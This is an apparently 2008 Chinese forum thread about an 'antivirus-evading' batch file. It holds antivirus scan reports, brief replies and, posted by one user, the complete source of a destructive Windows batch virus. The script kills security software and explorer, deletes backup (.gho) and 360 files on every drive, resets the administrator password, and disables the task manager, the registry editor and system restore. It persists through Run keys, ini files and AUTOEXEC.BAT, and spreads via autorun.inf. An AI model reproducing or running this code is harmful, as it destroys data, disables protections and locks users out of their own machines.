免杀批处理

yjfh

杀软不报毒，谨慎运行。

Starting the file scan:

Begin scan in 'D:\测试.rar'
D:\测试.rar
  [0] Archive type: RAR
  --> ²âÊÔ.bat
      [DETECTION] Contains detection pattern of the batch virus BAT/BadGrl
      [INFO]      The file was deleted!

[ 本帖最后由 Exia 于 2008-4-27 17:24 编辑 ]

jindun

楼主强人啊，无私分享

to jindun/请勿发表疑似灌水的语句，谢谢

[ 本帖最后由 qianwenxiang 于 2008-3-15 10:27 编辑 ]

kkgh

瑞星病毒查杀结果报告

清除病毒种类列表：
病毒： Harm.BAT.KillAV.a        

用户来源：互联网

软件版本：20.35.42

雨宫优子

代码很老，以前就在批处理论坛上见过了
我还曾经盗用了部分代码来搞恶作剧..
ESS报..

[ 本帖最后由 aarwwefdds 于 2008-3-15 10:33 编辑 ]

sam.to

上报到卡巴

kiki

生成cmd.bat

1. @echo off
   
2. title You DEAD!!!!!!!
   
3. set taskkill=s
   
4. copy %0 %windir%\system32\cmd.bat
   
5. attrib %windir%\system32\cmd.bat +r +s +h
   
6. net stop sharedaccess >nul
   
7. %s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
   
8. %s% /im norton* /f >nul
   
9. %s% /im av* /f >nul
   
10. %s% /im fire* /f >nul
    
11. %s% /im anti* /f >nul
    
12. %s% /im spy* /f >nul
    
13. %s% /im bullguard /f >nul
    
14. %s% /im PersFw /f >nul
    
15. %s% /im KAV* /f >nul
    
16. %s% /im ZONEALARM /f >nul
    
17. %s% /im ******* /f >nul
    
18. %s% /im OUTPOST /f >nul
    
19. %s% /im nv* /f >nul
    
20. %s% /im nav* /f >nul
    
21. %s% /im F-* /f >nul
    
22. %s% /im ESAFE /f >nul
    
23. %s% /im cle /f >nul
    
24. %s% /im BLACKICE /f >nul
    
25. %s% /im def* /f >nul
    
26. %s% /im 360safe.exe /f >nul
    
27. net stop Shadow" "System" "Service
    
28. set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
    
29. for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
    
30. for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
    
31. rem 修改注册表.......
    
32. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\
    
33. Folder\Hidden\SHOWALL /v
    
34. CheckedValue /t REG_DWORD /d 00000000 /f >nul
    
35. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
    
36. NoRun /t REG_DWORD /d
    
37. 00000001 /f >nul
    
38. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
    
39. NoRecentDocsMenu /t
    
40. REG_DWORD /d 00000001 /f >nul
    
41. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
    
42. NoDrives /t REG_DWORD /d
    
43. 4294967295 /f >nul
    
44. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
    
45. Disableregistrytools /t
    
46. REG_DWORD /d 00000002 /f >nul
    
47. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
    
48. NoNetHood /t REG_DWORD /d
    
49. 00000001 /f >nul
    
50. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /V
    
51. NoDesktop /t REG_DWORD /d
    
52. 00000001 /f >nul
    
53. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
    
54. NoClose /t REG_DWORD /d
    
55. 00000001 /f >nul
    
56. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
    
57. NoFind /t REG_DWORD /d
    
58. 00000001 /f >nul
    
59. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
    
60. DisableTaskMgr /t REG_DWORD
    
61. /d 00000001 /f >nul
    
62. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
    
63. NoLogOff /t REG_DWORD /d
    
64. 00000001 /f >nul
    
65. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
    
66. NoSetTaskBar /t REG_DWORD
    
67. /d 00000001 /f >nul
    
68. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v
    
69. DisableSR /t REG_DWORD /d
    
70. 00000001 /f >nul
    
71. REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v
    
72. DisableConfig /t REG_DWORD /d
    
73. 00000001 /f >nul
    
74. REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie*\**plorer /v
    
75. RestrictRun /t REG_DWORD /d
    
76. 00000001 /f >nul
    
77. cls
    
78. net user administrator 123456 >nul
    
79. for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
    
80. echo @echo off >d:\setup.bat
    
81. echo shutdown -r -t 10 -f -c 亲爱的朋友，我十分抱歉的通知你，你的电脑已经严重崩溃，请重新
    
82. 安装系统可以解决此问题
    
83. !^.^ >>d:\setup.bat
    
84. echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动
    
85. \a.bat >>d:\setup.bat
    
86. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
    
87. setup.bat /t REG_SZ /d d:\setup.bat
    
88. /f >>d:\setup.bat
    
89. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
    
90. setup.bat /t REG_SZ /d d:\setup.bat
    
91. /f >>d:\setup.bat
    
92. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
    
93. setup.bat /t REG_SZ /d d:\setup.bat
    
94. /f >>d:\setup.bat
    
95. HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f
    
96. >>d:\setup.bat
    
97. echo [windows] >> %windir%\win.ini
    
98. echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
    
99. echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
    
100. echo [boot] >> %windir%\system.ini
     
101. echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
     
102. echo [AutoRun] >d:\autorun.inf
     
103. echo Open=setup.bat >>d:\autorun.inf
     
104. echo Open=system.bat >>d:\autorun.inf
     
105. attrib d:\autorun.inf +r +s +h >>d:\setup.bat
     
106. attrib d:\setup.bat +r +s +h >>d:\setup.bat
     
107. start d:\setup.bat /min >nul
     
108. echo @echo off >>C:\AUTOEXEC.BAT
     
109. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
     
110. AUTOEXEC.BAT /t REG_SZ /d
     
111. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
     
112. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
     
113. AUTOEXEC.BAT /t REG_SZ /d
     
114. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
     
115. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
     
116. AUTOEXEC.BAT /t REG_SZ /d
     
117. C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
     
118. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
     
119. setup.bat /t REG_SZ /d d:\setup.bat
     
120. /f >>C:\AUTOEXEC.BAT
     
121. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
     
122. setup.bat /t REG_SZ /d d:\setup.bat
     
123. /f >>C:\AUTOEXEC.BAT
     
124. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
     
125. setup.bat /t REG_SZ /d d:\setup.bat
     
126. /f >>C:\AUTOEXEC.BAT
     
127. echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
     
128. copy %0 %systemroot%\windows.bat >nul
     
129. if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
     
130. if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%
     
131. windir%/system32/explorer.bat
     
132. if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%
     
133. windir%/system32/explorer.bat
     
134. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
     
135. AUTOEXEC.BAT /t REG_SZ /d
     
136. C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
     
137. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
     
138. AUTOEXEC.BAT /t REG_SZ /d
     
139. C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
     
140. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
     
141. setup.bat /t REG_SZ /d d:\setup.bat
     
142. /f >>%windir%/system32/explorer.bat
     
143. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
     
144. setup.bat /t REG_SZ /d d:\setup.bat
     
145. /f >>%windir%/system32/explorer.bat
     
146. echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
     
147. explorer.bat /t REG_SZ /d %
     
148. windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
     
149. echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
     
150. explorer.bat /t REG_SZ /d %
     
151. windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
     
152. echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
     
153. attrib %windir%/system32/explorer.bat +r +s +h%
     
154. attrib %systemroot%/windows.bat +r +s +h
     
155. for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
     
156. for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
     
157. for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
     
158. set drive=e f g h i j k l m n o p q r s t u v w x y z
     
159. for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
     
160. for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
     
161. copy %0 d:\Program" "Files\run.bat
     
162. for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start
     
163. d:\Program" "Files\run.bat /min
     
164. >>%%c:\system.bat
     
165. for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
     
166. for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul
     
167. for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul
     
168. if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat
     
169. /min >>d:\setup.bat
     
170. attrib d:\Program" "Files\run.bat +r +s +h >nul
     
171. del %0
     
172. exit

复制代码

千里同风

问一句，这类东东VISTA系统能自己防护不？

IllusionWing

批处理是UG的强项...
直接是EmuBat.KillAV.Gen

微点卫士

运行后什么事情都没有嘛，系统正常